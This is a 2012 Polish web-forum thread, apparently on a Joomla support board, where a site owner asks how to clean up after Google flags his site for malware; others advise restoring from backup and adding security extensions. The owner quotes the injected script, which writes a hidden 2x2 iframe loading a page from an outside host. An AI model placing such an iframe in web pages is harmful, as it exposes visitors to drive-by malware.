PDA

Zobacz pełną wersję : złośliwe oprogramowanie google na mojej witrynie



beRRo
12-07-2012, 17:09
Witam, dziś wchodząc na moją stronę ujrzałem informację ! o złośliwym oprogramowaniu.
[usunięto // zwiastun]

Mam problem, skanując pliki na serwerze nie wykryto mi żadnych zagrożeń. Co do wierszy nie mam sposobu gdzie można z edytować te pliki (linijkę) w jakim folderze się mieści zawartość?
Wszystkie podejrzane kody wyglądają tak:



Podejrzany kod
Wystąpienia


<script type="text/javascript">
document.write('<iframe src="http://playart.org/sites/stats.
php" name="Twitter" scrolling="auto" frameborder="no" align=
"center" height="2" width="2"></iframe>');
</script>

zwiastun
12-07-2012, 17:14
Witryna jest pod kontrolą bandziorków internetowych. Jak postępować po włamaniu - zobacz na wiki.
A zanim kiedykolwiek jeszcze podeślesz linka do zarażonego zasobu, to stuknij się w głowę jakimś przyzwoitym dobijakiem.

PS Jak Cię Google dorwie za pomówienie, to dopiero będziesz mieć problem.

beRRo
12-07-2012, 17:29
PS Jak Cię Google dorwie za pomówienie, to dopiero będziesz mieć problem.

Pomówienie? Za co niby?


Witryna jest pod kontrolą bandziorków internetowych. Jak postępować po włamaniu - zobacz na wiki.
Dziś jeszcze poszukam, spr. czy zdołam temu się uporać? Jeżeli się nie uporam? To co najlepiej bym musiał zrobić? Zamknąć witrynę? Czy jak?

zwiastun
12-07-2012, 17:33
Pomówienie? Za co niby?
Twierdzisz w temacie posta, ze Google Ci umieściło w witrynie złośliwe oprogramowanie :)

beRRo
12-07-2012, 17:35
Twierdzisz w temacie posta, ze Google Ci umieściło w witrynie złośliwe oprogramowanie :)

Właśnie odwołuję się do tego czy można w jakiś sposób tego się pozbyć? Jeżeli tak, to w jaki sposób? Te wiersze wyedytować i usunąć wiersze zainfekowane ?


EDIT@ :
Czy pomoże w tym wgranie poprzedniej bazy danych? i katalogu?

zwiastun
12-07-2012, 17:56
Otrzymałeś odpowiedź na swoje pytanie. Nie zachowuj się jak dzieciak - odszukaj na wiki instrukcje postępowania (skoro do tej pory nie wypracowałeś swoich) na wypadek uszkodzenia witryny i zabieraj się za robotę.
http://wiki.joomla.pl/index.php/Bezpiecze%C5%84stwo_-_lista_kontrolna_6:_Odtwarzanie_witryny

beRRo
12-07-2012, 18:09
Przeinstaluj wszystko na stronie
Użyj kopii strony sprzed włamania.

Odniosę się do tego pkt. lecz jak zabezpieczyć się przed kolejnymi włamaniami? Czt istnieje dobry dodatek.komponent dla bezpieczeństwa joomla?

Gall Anonim
12-07-2012, 23:54
N.P. RSfirewall, Admintools itd
Natomiast to odtworzeniu witryny należy zgłosić do ponownego rozpatrzenia jeżeli chcesz aby informacja znikła w miarę szybko - ostatnio wykonywałem właśnie operację odtwarzania zawirusowane witryny i po zgłoszeniu do rozpatrzenia informacja o niebezpieczeństwie została rozpatrzona w przeciągu zaledwie trzech dni i usunięta.
Pzdr